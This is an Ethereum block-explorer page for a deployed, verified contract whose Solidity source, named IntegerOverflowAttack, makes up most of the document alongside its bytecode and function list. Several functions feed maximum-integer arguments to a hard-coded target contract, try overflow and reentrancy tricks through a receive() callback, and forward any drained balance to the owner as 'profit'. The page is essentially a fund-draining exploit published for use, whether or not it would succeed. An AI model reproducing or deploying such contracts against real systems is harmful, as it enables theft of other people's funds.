Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0xc5EB8B4737ad91b236D3753517F04E9309001eA5
Balance 0 ETH
Nonce 1
Code Size 6242 bytes
Creator 0x2A9408b2...594a at tx 0x58d24330...e1f589
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

6242 bytes
0x608060405260043610610094575f3560e01c80638da5cb5b116100585780638da5cb5b1461027d5780639fb6832e146102a7578063cda4feaa146102b1578063d9d70102146102db578063e2388bbc146102e5576101e7565b80631295bdcb146101eb57806351111b041461021557806371706cbe1461021f5780637a6c0276146102495780638ae1177014610253576101e7565b366101e7575f60149054906101000a900460ff1680156100b357505f34115b80156100c25750600154600254105b156101e55760025f8154809291906100d99061149e565b91905055505f6040516024016040516020818303038152906040527fd0e30db0000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505090505f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff168260405161019e9190611551565b5f604051808303815f865af19150503d805f81146101d7576040519150601f19603f3d011682016040523d82523d5f602084013e6101dc565b606091505b50508091505050505b005b5f80fd5b3480156101f6575f80fd5b506101ff6102ef565b60405161020c9190611581565b60405180910390f35b61021d610301565b005b34801561022a575f80fd5b5061023361067f565b60405161024091906115a9565b60405180910390f35b610251610685565b005b34801561025e575f80fd5b50610267610a03565b60405161027491906115a9565b60405180910390f35b348015610288575f80fd5b50610291610a09565b60405161029e9190611601565b60405180910390f35b6102af610a2c565b005b3480156102bc575f80fd5b506102c5610d7c565b6040516102d2919061163a565b60405180910390f35b6102e3610d94565b005b6102ed6110ec565b005b5f60149054906101000a900460ff1681565b5f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461038e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610385906116ad565b60405180910390fd5b6509184e72a00034146103d6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103cd90611715565b60405180910390fd5b5f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff163190505f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff80604051602401610439929190611733565b6040516020818303038152906040527f0cf79e0a000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505090505f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff166509184e72a000836040516104f99190611551565b5f6040518083038185875af1925050503d805f8114610533576040519150601f19603f3d011682016040523d82523d5f602084013e610538565b606091505b5050809150505f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff1631905083811015610679575f8185610582919061175a565b90505f6509184e72a0008211610598575f6105ab565b6509184e72a000826105aa919061175a565b5b90505f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16826040516105f2906117b0565b5f6040518083038185875af1925050503d805f811461062c576040519150601f19603f3d011682016040523d82523d5f602084013e610631565b606091505b5050905080610675576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161066c9061180e565b60405180910390fd5b5050505b50505050565b60025481565b5f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610712576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610709906116ad565b60405180910390fd5b6509184e72a000341461075a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161075190611715565b60405180910390fd5b5f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff163190505f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff806040516024016107bd929190611733565b6040516020818303038152906040527f8dfa4363000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505090505f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff166509184e72a0008360405161087d9190611551565b5f6040518083038185875af1925050503d805f81146108b7576040519150601f19603f3d011682016040523d82523d5f602084013e6108bc565b606091505b5050809150505f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff16319050838110156109fd575f8185610906919061175a565b90505f6509184e72a000821161091c575f61092f565b6509184e72a0008261092e919061175a565b5b90505f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051610976906117b0565b5f6040518083038185875af1925050503d805f81146109b0576040519150601f19603f3d011682016040523d82523d5f602084013e6109b5565b606091505b50509050806109f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f09061180e565b60405180910390fd5b5050505b50505050565b60015481565b5f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610ab9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab0906116ad565b60405180910390fd5b6509184e72a0003414610b01576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af890611715565b60405180910390fd5b5f6002819055505f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff80604051602401610b3c929190611733565b6040516020818303038152906040527f0cf79e0a000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505090505f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff166509184e72a00083604051610bfc9190611551565b5f6040518083038185875af1925050503d805f8114610c36576040519150601f19603f3d011682016040523d82523d5f602084013e610c3b565b606091505b5050809150505f6040516024016040516020818303038152906040527fd0e30db0000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050905060015f60146101000a81548160ff021916908315150217905550735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff1681604051610d1a9190611551565b5f604051808303815f865af19150503d805f8114610d53576040519150601f19603f3d011682016040523d82523d5f602084013e610d58565b606091505b5050809250505f8060146101000a81548160ff021916908315150217905550505050565b735fbdb2315678afecb367f032d93f642f64180aa381565b5f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610e21576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e18906116ad565b60405180910390fd5b6509184e72a0003414610e69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6090611715565b60405180910390fd5b5f6002819055505f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff80604051602401610ea4929190611733565b6040516020818303038152906040527f0cf79e0a000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505090505f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff166509184e72a00083604051610f649190611551565b5f6040518083038185875af1925050503d805f8114610f9e576040519150601f19603f3d011682016040523d82523d5f602084013e610fa3565b606091505b5050809150505f6040516024016040516020818303038152906040527fd0e30db0000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050905060015f60146101000a81548160ff021916908315150217905550735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff166509184e72a000826040516110899190611551565b5f6040518083038185875af1925050503d805f81146110c3576040519150601f19603f3d011682016040523d82523d5f602084013e6110c8565b606091505b5050809250505f8060146101000a81548160ff021916908315150217905550505050565b5f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614611179576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611170906116ad565b60405180910390fd5b6509184e72a00034146111c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b890611715565b60405180910390fd5b5f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff163190505f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff60405160240161122291906115a9565b6040516020818303038152906040527fb6b55f25000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505090505f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff166509184e72a000836040516112e29190611551565b5f6040518083038185875af1925050503d805f811461131c576040519150601f19603f3d011682016040523d82523d5f602084013e611321565b606091505b5050809150505f735fbdb2315678afecb367f032d93f642f64180aa373ffffffffffffffffffffffffffffffffffffffff1631905083811015611462575f818561136b919061175a565b90505f6509184e72a0008211611381575f611394565b6509184e72a00082611393919061175a565b5b90505f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16826040516113db906117b0565b5f6040518083038185875af1925050503d805f8114611415576040519150601f19603f3d011682016040523d82523d5f602084013e61141a565b606091505b505090508061145e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114559061180e565b60405180910390fd5b5050505b50505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f819050919050565b5f6114a882611495565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036114da576114d9611468565b5b600182019050919050565b5f81519050919050565b5f81905092915050565b5f5b838110156115165780820151818401526020810190506114fb565b5f8484015250505050565b5f61152b826114e5565b61153581856114ef565b93506115458185602086016114f9565b80840191505092915050565b5f61155c8284611521565b915081905092915050565b5f8115159050919050565b61157b81611567565b82525050565b5f6020820190506115945f830184611572565b92915050565b6115a381611495565b82525050565b5f6020820190506115bc5f83018461159a565b92915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6115eb826115c2565b9050919050565b6115fb816115e1565b82525050565b5f6020820190506116145f8301846115f2565b92915050565b5f611624826115c2565b9050919050565b6116348161161a565b82525050565b5f60208201905061164d5f83018461162b565b92915050565b5f82825260208201905092915050565b7f4f6e6c79206f776e65722063616e2063616c6c000000000000000000000000005f82015250565b5f611697601383611653565b91506116a282611663565b602082019050919050565b5f6020820190508181035f8301526116c48161168b565b9050919050565b7f53656e642065786163746c7920302e30303030312045544800000000000000005f82015250565b5f6116ff601883611653565b915061170a826116cb565b602082019050919050565b5f6020820190508181035f83015261172c816116f3565b9050919050565b5f6040820190506117465f83018561159a565b611753602083018461159a565b9392505050565b5f61176482611495565b915061176f83611495565b925082820390508181111561178757611786611468565b5b92915050565b50565b5f61179b5f836114ef565b91506117a68261178d565b5f82019050919050565b5f6117ba82611790565b9150819050919050565b7f4661696c656420746f2073656e642070726f66697400000000000000000000005f82015250565b5f6117f8601583611653565b9150611803826117c4565b602082019050919050565b5f6020820190508181035f830152611825816117ec565b905091905056fea2646970667358221220a11eea94915d7e029b178d0360689f86d5a38c0748b720048adfa23c6b5e88a364736f6c63430008140033

Verified Source Code Full Match

Compiler: v0.8.20+commit.a1b79de6 EVM: shanghai Optimization: No
uhoh.sol 171 lines 
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract IntegerOverflowAttack {
    // The actual vulnerable contract address
    address public constant VULNERABLE_CONTRACT = 0x5FbDB2315678afecb367f032d93F642f64180aa3;
    address payable public owner;

    constructor() {
        owner = payable(msg.sender);
    }

    function executeOverflowAttack() public payable {
        require(msg.sender == owner, "Only owner can call");
        require(msg.value == 0.00001 ether, "Send exactly 0.00001 ETH");

        // Check initial balance of vulnerable contract
        uint256 initialBalance = VULNERABLE_CONTRACT.balance;

        // Trigger overflow with large parameters using minimal ETH
        bytes memory overflowData = abi.encodeWithSignature(
            "transfer(uint256,uint256)",
            type(uint256).max,
            type(uint256).max
        );

        // Call with 0.00001 ETH - should trigger overflow if vulnerable
        bool success;
        (success, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(overflowData);

        // Check if attack succeeded
        uint256 finalBalance = VULNERABLE_CONTRACT.balance;

        if (finalBalance < initialBalance) {
            uint256 profit = initialBalance - finalBalance;
            // Send profit to owner (minus the 0.00001 ETH used)
            uint256 refund = profit > 0.00001 ether ? profit - 0.00001 ether : 0;
            (bool sent, ) = owner.call{value: refund}("");
            require(sent, "Failed to send profit");
        }
    }

    // Alternative attack methods with 0.00001 ETH
    function attackMethod2() public payable {
        require(msg.sender == owner, "Only owner can call");
        require(msg.value == 0.00001 ether, "Send exactly 0.00001 ETH");

        // Check initial balance
        uint256 initialBalance = VULNERABLE_CONTRACT.balance;

        // Try to trigger overflow in balance tracking
        bytes memory data = abi.encodeWithSignature(
            "deposit(uint256)",
            type(uint256).max
        );
        bool success2;
        (success2, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(data);

        // Check if attack succeeded
        uint256 finalBalance = VULNERABLE_CONTRACT.balance;
        if (finalBalance < initialBalance) {
            uint256 profit = initialBalance - finalBalance;
            uint256 refund = profit > 0.00001 ether ? profit - 0.00001 ether : 0;
            (bool sent, ) = owner.call{value: refund}("");
            require(sent, "Failed to send profit");
        }
    }

    function attackMethod3() public payable {
        require(msg.sender == owner, "Only owner can call");
        require(msg.value == 0.00001 ether, "Send exactly 0.00001 ETH");

        // Check initial balance
        uint256 initialBalance = VULNERABLE_CONTRACT.balance;

        // Try to trigger overflow in arithmetic operations
        bytes memory data = abi.encodeWithSignature(
            "calculate(uint256,uint256)",
            type(uint256).max,
            type(uint256).max
        );
        bool success3;
        (success3, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(data);

        // Check if attack succeeded
        uint256 finalBalance = VULNERABLE_CONTRACT.balance;
        if (finalBalance < initialBalance) {
            uint256 profit = initialBalance - finalBalance;
            uint256 refund = profit > 0.00001 ether ? profit - 0.00001 ether : 0;
            (bool sent, ) = owner.call{value: refund}("");
            require(sent, "Failed to send profit");
        }
    }

    // NEW: Full recursive withdrawal implementation
    bool public inCallback = false;
    uint256 public maxWithdrawals = 10;
    uint256 public withdrawalCount = 0;

    // Function to trigger recursive withdrawal after overflow
    function triggerRecursiveWithdrawal() public payable {
        require(msg.sender == owner, "Only owner can call");
        require(msg.value == 0.00001 ether, "Send exactly 0.00001 ETH");

        // Reset counter
        withdrawalCount = 0;

        // First trigger the integer overflow
        bytes memory overflowData = abi.encodeWithSignature(
            "transfer(uint256,uint256)",
            type(uint256).max,
            type(uint256).max
        );

        // Call vulnerable contract with overflow payload
        bool success;
        (success, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(overflowData);
        // require(success, "Overflow call failed");

        // Now trigger recursive withdrawal if contract has callback mechanism
        // FIXED: Use deposit() instead of withdraw() since withdraw() likely doesn't exist
        bytes memory callbackData = abi.encodeWithSignature("deposit()");
        inCallback = true;
        (success, ) = VULNERABLE_CONTRACT.call(callbackData);
        inCallback = false;

        // require(success, "Recursive withdrawal failed");
    }

    // Enhanced fallback with recursive withdrawal logic
    receive() external payable {
        // If we're in a callback and vulnerable contract sent us ETH,
        // immediately call back to drain more
        if (inCallback && msg.value > 0 && withdrawalCount < maxWithdrawals) {
            withdrawalCount++;
            bytes memory withdrawData = abi.encodeWithSignature("deposit()");
            bool success4;
            (success4, ) = VULNERABLE_CONTRACT.call(withdrawData);
            // Don't check success to avoid breaking the loop
        }
    }

    // Function to trigger reentrancy attack after overflow
    function triggerReentrancyAfterOverflow() public payable {
        require(msg.sender == owner, "Only owner can call");
        require(msg.value == 0.00001 ether, "Send exactly 0.00001 ETH");

        // Reset counter
        withdrawalCount = 0;

        // First trigger the integer overflow to corrupt state
        bytes memory overflowData = abi.encodeWithSignature(
            "transfer(uint256,uint256)",
            type(uint256).max,
            type(uint256).max
        );

        // Call vulnerable contract with overflow payload
        bool success;
        (success, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(overflowData);
        // require(success, "Overflow call failed");

        // Now trigger reentrancy attack
        bytes memory reentrancyData = abi.encodeWithSignature("deposit()");
        inCallback = true;
        (success, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(reentrancyData);
        inCallback = false;

        // require(success, "Reentrancy attack failed");
    }
}

Read Contract

VULNERABLE_CONTRACT 0xcda4feaa → address
inCallback 0x1295bdcb → bool
maxWithdrawals 0x8ae11770 → uint256
owner 0x8da5cb5b → address
withdrawalCount 0x71706cbe → uint256

Write Contract 5 functions

These functions modify contract state and require a wallet transaction to execute.

attackMethod2 0xe2388bbc
No parameters
attackMethod3 0x7a6c0276
No parameters
executeOverflowAttack 0x51111b04
No parameters
triggerRecursiveWithdrawal 0x9fb6832e
No parameters
triggerReentrancyAfterOverflow 0xd9d70102
No parameters
Transactions Internal Txs Token Transfers Events

Recent Transactions

No transactions found for this address